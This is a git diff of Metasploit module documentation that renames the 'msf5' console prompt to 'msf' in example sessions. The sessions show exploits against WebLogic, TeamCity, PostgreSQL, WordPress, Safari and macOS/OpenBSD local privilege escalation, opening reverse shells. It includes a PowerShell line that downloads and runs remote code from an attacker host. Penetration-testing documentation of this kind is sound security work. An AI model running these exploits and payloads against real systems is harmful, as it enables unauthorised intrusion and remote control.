exploit(multi/misc/osgi_console_exec) > run [*] Exploit running as background job 2. [*] Started reverse TCP handler on 172.20.10.2:4444 [*] 172.20.10.3:5555 - Accessing the OSGi console ... @@ -140,7 +140,7 @@ msf5 exploit(multi/misc/osgi_console_exec) > run [*] 172.20.10.3:5555 - 172.20.10.3:5555 - Waiting for session... [*] Sending stage (179779 bytes) to 172.20.10.3 [*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.3:49365) at 2018-02-14 19:14:15 +0100 -msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1 +msf exploit(multi/misc/osgi_console_exec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo diff --git a/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md b/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md index e66588bdf3..c6875f821e 100644 --- a/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md 
+++ b/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md @@ -40,14 +40,14 @@ If specified the module will run the specified command instead of executing the ### Windows Server 2012 R2 (x64) with TeamCity Agent 2018.1 ``` -msf5 > use exploit/multi/misc/teamcity_agent_xmlrpc_exec -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149 +msf > use exploit/multi/misc/teamcity_agent_xmlrpc_exec +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149 RHOSTS => 172.16.198.149 -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0 +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0 LHOST => eth0 -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run [*] Started reverse TCP handler on 172.16.198.150:4444 [*] Found TeamCity Agent running build version 58245 diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md index d1bfaef5d0..46914cc796 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md 
@@ -20,17 +20,17 @@ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, v12.2.1.2, and v12.2.1.3 are vulner ### Tested on Windows 10 x64 running Oracle Weblogic Server 10.3.6.0 on JDK v7u17 ``` -msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175 +msf exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175 rhosts => 172.22.222.175 -msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121 +msf exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121 srvhost => 172.22.222.121 -msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888 +msf exploit(multi/misc/weblogic_deserialize) > set srvport 8888 srvport => 8888 -msf5 exploit(multi/misc/weblogic_deserialize) > set target 1 +msf exploit(multi/misc/weblogic_deserialize) > set target 1 target => 1 -msf5 exploit(multi/misc/weblogic_deserialize) > run +msf exploit(multi/misc/weblogic_deserialize) > run [*] Exploit running as background job 0. -msf5 exploit(multi/misc/weblogic_deserialize) > +msf exploit(multi/misc/weblogic_deserialize) > [*] Started reverse TCP handler on 172.22.222.121:4444 [*] Sending stage (179779 bytes) to 172.22.222.175 [*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500 
@@ -50,22 +50,22 @@ meterpreter > ### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29 ``` -msf5 > use exploit/multi/misc/weblogic_deserialize -msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205 +msf > use exploit/multi/misc/weblogic_deserialize +msf exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205 rhosts => 172.22.222.205 -msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207 +msf exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207 srvhost => 172.22.222.207 -msf5 exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207 +msf exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207 lhost => 172.22.222.207 -msf5 exploit(multi/misc/weblogic_deserialize) > set verbose true +msf exploit(multi/misc/weblogic_deserialize) > set verbose true verbose => true -msf5 exploit(multi/misc/weblogic_deserialize) > check +msf exploit(multi/misc/weblogic_deserialize) > check [+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0 [*] 172.22.222.205:7001 The target appears to be vulnerable. -msf5 exploit(multi/misc/weblogic_deserialize) > run +msf exploit(multi/misc/weblogic_deserialize) > run [*] Exploit running as background job 0. -msf5 exploit(multi/misc/weblogic_deserialize) > +msf exploit(multi/misc/weblogic_deserialize) > [*] Started reverse TCP handler on 172.22.222.207:4444 [*] 172.22.222.205:7001 - Sending handshake... [*] 172.22.222.205:7001 - Sending client object payload... @@ -75,7 +75,7 @@ msf5 exploit(multi/misc/weblogic_deserialize) > [*] Command shell session 1 opened (172.22.222.207:4444 -> 172.22.222.205:37168) at 2018-08-30 06:10:31 -0500 [*] 172.22.222.205:7001 - Server stopped. -msf5 exploit(multi/misc/weblogic_deserialize) > sessions -i 1 +msf exploit(multi/misc/weblogic_deserialize) > sessions -i 1 [*] Starting interaction with 1... uname -a 
diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md index 41469c89f3..1b49dd358e 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md @@ -35,7 +35,7 @@ in combination with a JDK (`jdk-8u211-windows-x64.exe`). 5. Look for the following output: ``` -msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check +msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check [+] 172.16.135.128:8088 - The target is vulnerable. ``` @@ -54,7 +54,7 @@ Set this to the AsyncResponseService uri, normally it should be `/_async/asyncre ## Scenarios ``` -msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit +msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit [*] Started reverse TCP handler on 172.16.135.1:4444 [*] Generating payload... diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md index 369eec1a4f..bff7d43633 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md 
@@ -49,12 +49,12 @@ ### WebLogic `v12.2.1.4.0` on Windows 10 ``` - msf5 > use exploit/multi/misc/weblogic_deserialize_badattr_extcomp - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.181 + msf > use exploit/multi/misc/weblogic_deserialize_badattr_extcomp + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.181 rhosts => 172.16.215.181 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set lhost 172.16.215.1 + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set lhost 172.16.215.1 lhost => 172.16.215.1 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.181:7001 - Executing automatic check (disable AutoCheck to override) @@ -81,11 +81,11 @@ ### WebLogic `v12.2.1.4.0` on Ubuntu 18.04 ``` - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set target 1 + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set target 1 target => 1 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.180 + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.180 rhosts => 172.16.215.180 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.180:7001 - Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md index b7635aaffa..26ead6c471 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md 
@@ -44,12 +44,12 @@ ### WebLogic `v12.2.1.4` on Windows 10 ``` - msf5 > use exploit/multi/misc/weblogic_deserialize_badattrval - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185 + msf > use exploit/multi/misc/weblogic_deserialize_badattrval + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.185 rhosts => 172.16.215.185 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1 + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set lhost 172.16.215.1 lhost => 172.16.215.1 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run + msf exploit(multi/misc/weblogic_deserialize_badattrval) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.185:7001 - WebLogic version detected: 12.2.1.4.0 @@ -74,13 +74,13 @@ ### WebLogic `v12.1.3.0.0` on Ubuntu 18.04 Linux ``` - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1 + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1 target => 1 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196 + msf exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196 rhosts => 172.16.215.196 - msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run + msf exploit(multi/misc/weblogic_deserialize_badattrval) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0 diff --git a/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md index b946c1759e..24f2c0dad0 100644 
--- a/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md +++ b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md @@ -44,14 +44,14 @@ The path to the installer.php file to exploit By default, the path is `/installe ### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40 ``` -msf5 > use exploit/multi/php/wp_duplicator_code_inject -msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247 +msf > use exploit/multi/php/wp_duplicator_code_inject +msf exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247 rhosts => 192.168.37.247 -msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php +msf exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php targeturi => /wordpress/installer.php -msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1 +msf exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(multi/php/wp_duplicator_code_inject) > run +msf exploit(multi/php/wp_duplicator_code_inject) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Checking if the wp-config.php file already exists... diff --git a/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md b/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md index 806087fbde..bb3c361b1a 100644 --- a/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md +++ b/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md 
@@ -73,19 +73,19 @@ Use the techniques described in this blogpost to verify command execution: ### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres DATABASE => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set USERNAME postgres + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set USERNAME postgres USERNAME => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD postgres + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD postgres PASSWORD => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/reverse_perl + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.0.18 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.0.18 LHOST => 192.168.0.18 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.25 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.25 RHOSTS => 192.168.0.25 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec): 
@@ -114,7 +114,7 @@ Use the techniques described in this blogpost to verify command execution: -- ---- 0 Automatic - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit [*] Started reverse TCP handler on 192.168.0.18:4456 [*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit @@ -135,13 +135,13 @@ Use the techniques described in this blogpost to verify command execution: ### Exploiting PostgreSQL 10.7 on Windows 10 - msf5 exploit(multi/script/web_delivery) > set target 2 + msf exploit(multi/script/web_delivery) > set target 2 target => 2 - msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp + msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.0.18 + msf exploit(multi/script/web_delivery) > set LHOST 192.168.0.18 LHOST => 192.168.0.18 - msf5 exploit(multi/script/web_delivery) > show options + msf exploit(multi/script/web_delivery) > show options Module options (exploit/multi/script/web_delivery): @@ -170,7 +170,7 @@ Use the techniques described in this blogpost to verify command execution: 2 PSH - msf5 exploit(multi/script/web_delivery) > exploit -j + msf exploit(multi/script/web_delivery) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. 
@@ -179,14 +179,14 @@ Use the techniques described in this blogpost to verify command execution: [*] Local IP: http://192.168.0.18:8080/pUDD5sy8vTTD [*] Server started. [*] Run the following command on the target machine: - msf5 exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD'); + msf exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD'); - msf5 exploit(multi/script/web_delivery) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres + msf exploit(multi/script/web_delivery) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DATABASE postgres DATABASE => postgres - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.24 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.24 RHOSTS => 192.168.0.24 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec): 
@@ -208,9 +208,9 @@ Use the techniques described in this blogpost to verify command execution: 0 Automatic - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set COMMAND powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(\'http://192.168.0.18:8080/pUDD5sy8vTTD\'); + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set COMMAND powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(\'http://192.168.0.18:8080/pUDD5sy8vTTD\'); COMMAND => powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring('http://192.168.0.18:8080/pUDD5sy8vTTD') - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit [*] Started reverse TCP double handler on 192.168.0.18:4456 [*] 192.168.0.24:5432 - 192.168.0.24:5432 - PostgreSQL 10.7, compiled by Visual C++ build 1800, 32-bit 
@@ -221,11 +221,11 @@ Use the techniques described in this blogpost to verify command execution: [!] 192.168.0.24:5432 - 192.168.0.24:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'powershell.exe -nop -w hidden -c $a=new-object net.webclient;$a.proxy=[Net.WebRequest]::GetSystemWebProxy();$a.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $a.downloadstring(''http://192.168.0.18:8080/pUDD5sy8vTTD'');'; [*] 192.168.0.24:5432 - Exploit Failed [*] Exploit completed, but no session was created. - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > [*] Sending stage (179779 bytes) to 192.168.0.24 [*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.24:50154) at 2019-03-24 17:40:59 +0000 - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show sessions + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show sessions Active sessions =============== @@ -234,7 +234,7 @@ Use the techniques described in this blogpost to verify command execution: -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\NETWORK SERVICE @ DESKTOP-BHTT8OP 192.168.0.18:4444 -> 192.168.0.24:50154 (192.168.0.24) - msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -i 1 + msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid diff --git a/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md b/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md index cb8bfc80d2..0bc2f339ee 100644 --- a/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md +++ b/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md 
@@ -45,15 +45,15 @@ Exploit targets: ## Scenarios ``` -msf5 exploit(multi/scada/inductive_ignition_rce) > set rhost 10.10.10.204 +msf exploit(multi/scada/inductive_ignition_rce) > set rhost 10.10.10.204 rhost => 10.10.10.204 -msf5 exploit(multi/scada/inductive_ignition_rce) > set lhost 10.10.10.1 +msf exploit(multi/scada/inductive_ignition_rce) > set lhost 10.10.10.1 lhost => 10.10.10.1 -msf5 exploit(multi/scada/inductive_ignition_rce) > check +msf exploit(multi/scada/inductive_ignition_rce) > check [*] 10.10.10.204:8088 - Detected version 8.0.7 [*] 10.10.10.204:8088 - The target appears to be vulnerable. -msf5 exploit(multi/scada/inductive_ignition_rce) > run +msf exploit(multi/scada/inductive_ignition_rce) > run [*] Started reverse TCP handler on 10.10.10.1:4444 [*] 10.10.10.204:8088 - Attacking Windows target diff --git a/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md b/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md index f8ebcc530c..c0a65e1389 100644 --- a/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md +++ b/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md 
@@ -46,19 +46,19 @@ ### OpenBSD 6.1 GENERIC#19 amd64 ``` - msf5 > use exploit/openbsd/local/dynamic_loader_chpass_privesc - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set verbose true + msf > use exploit/openbsd/local/dynamic_loader_chpass_privesc + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > set verbose true verbose => true - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set session 1 + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > set session 1 session => 1 - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > check + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > check [+] Patch 013_ldso is not present [+] cc is installed [*] The service is running, but could not be validated. - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set lhost 172.16.191.165 + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > run + msf exploit(openbsd/local/dynamic_loader_chpass_privesc) > run [*] Started reverse TCP double handler on 172.16.191.165:4444 [+] Patch 013_ldso is not present diff --git a/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md b/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md index 286f043d8f..45d92dea11 100644 --- a/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md +++ b/documentation/modules/exploit/osx/browser/safari_proxy_object_type_confusion.md 
@@ -27,24 +27,24 @@ via the launchd's "spawn_via_launchd" API (CVE-2018-4404). ### High Sierra 10.13 ``` -msf5 > use exploit/osx/browser/safari_proxy_object_type_confusion -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > set LHOST 192.168.0.2 +msf > use exploit/osx/browser/safari_proxy_object_type_confusion +msf exploit(osx/browser/safari_proxy_object_type_confusion) > set LHOST 192.168.0.2 LHOST => 192.168.0.2 -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > exploit +msf exploit(osx/browser/safari_proxy_object_type_confusion) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > +msf exploit(osx/browser/safari_proxy_object_type_confusion) > [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Using URL: http://0.0.0.0:8080/0PiuTy [*] Local IP: http://192.168.0.2:8080/0PiuTy [*] Server started. -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > +msf exploit(osx/browser/safari_proxy_object_type_confusion) > [*] 192.168.0.2 safari_proxy_object_type_confusion - Request from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38 [*] Sending stage (53508 bytes) to 192.168.0.2 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:33200) at 2018-11-20 16:28:59 +0800 -msf5 exploit(osx/browser/safari_proxy_object_type_confusion) > sessions 1 +msf exploit(osx/browser/safari_proxy_object_type_confusion) > sessions 1 [*] Starting interaction with 1... meterpreter > sysinfo diff --git a/documentation/modules/exploit/osx/local/feedback_assistant_root.md b/documentation/modules/exploit/osx/local/feedback_assistant_root.md index 6a9ffe5b34..5caf9187bc 100644 --- a/documentation/modules/exploit/osx/local/feedback_assistant_root.md +++ b/documentation/modules/exploit/osx/local/feedback_assistant_root.md 
@@ -6,9 +6,9 @@ privilege escalation. ## Scenarios ``` -msf5 exploit(osx/local/feedback_assistant_root) > check +msf exploit(osx/local/feedback_assistant_root) > check [*] The target appears to be vulnerable. -msf5 exploit(osx/local/feedback_assistant_root) > run +msf exploit(osx/local/feedback_assistant_root) > run [*] Started reverse TCP handler on 172.16.135.1:5555 [*] Uploading file: '/tmp/.fjbgrf' diff --git a/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md b/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md index 65a69fac53..9270b528c4 100644 --- a/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md +++ b/documentation/modules/exploit/osx/local/libxpc_mitm_ssudo.md @@ -24,14 +24,14 @@ replies from opendirectoryd to make it look like our password was valid. ## Scenarios ### Example Run ``` -msf5 exploit(multi/handler) > use exploit/osx/local/libxpc_mitm_ssudo -msf5 exploit(osx/local/libxpc_mitm_ssudo) > set LHOST 192.168.0.2 +msf exploit(multi/handler) > use exploit/osx/local/libxpc_mitm_ssudo +msf exploit(osx/local/libxpc_mitm_ssudo) > set LHOST 192.168.0.2 LHOST => 192.168.0.2 -msf5 exploit(osx/local/libxpc_mitm_ssudo) > set LPORT 4446 +msf exploit(osx/local/libxpc_mitm_ssudo) > set LPORT 4446 LPORT => 4446 -msf5 exploit(osx/local/libxpc_mitm_ssudo) > set SESSION 1 +msf exploit(osx/local/libxpc_mitm_ssudo) > set SESSION 1 SESSION => 1 -msf5 exploit(osx/local/libxpc_mitm_ssudo) > exploit +msf exploit(osx/local/libxpc_mitm_ssudo) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.0.2:4446 diff --git a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md index f631f6d901..932d31fe36 100644 --- a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md +++ b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md 
@@ -19,8 +19,8 @@ The tmdiagnose binary uses awk to list every mounted volume, and composes shell ``` -msf5 exploit(multi/handler) > use exploit/osx/local/timemachine_cmd_injection -msf5 exploit(osx/local/timemachine_cmd_injection) > exploit +msf exploit(multi/handler) > use exploit/osx/local/timemachine_cmd_injection +msf exploit(osx/local/timemachine_cmd_injection) > exploit [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 192.168.0.2:5555 diff --git a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md index c2cd83603a..86e52daca4 100644 --- a/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md +++ b/documentation/modules/exploit/osx/local/vmware_fusion_lpe.md @@ -40,7 +40,7 @@ Which session to use this exploit on. ### VMware Fusion 10.1.6 ``` -msf5 exploit(osx/local/vmware_fusion_lpe) > run +msf exploit(osx/local/vmware_fusion_lpe) > run [!] SESSION may not be compatible with this module. [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? @@ -203,7 +203,7 @@ resource (fusion.rb)> exploit [+] Deleted /Users/h00die/Contents/Library/services/TVOK7bDP [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_dir: Operation failed: Python exception: OSError [*] Exploit completed, but no session was created. -msf5 exploit(osx/local/vmware_fusion_lpe) > sessions -i 2 +msf exploit(osx/local/vmware_fusion_lpe) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md index 6fc9e281cd..826941c1d0 100644 --- a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md 
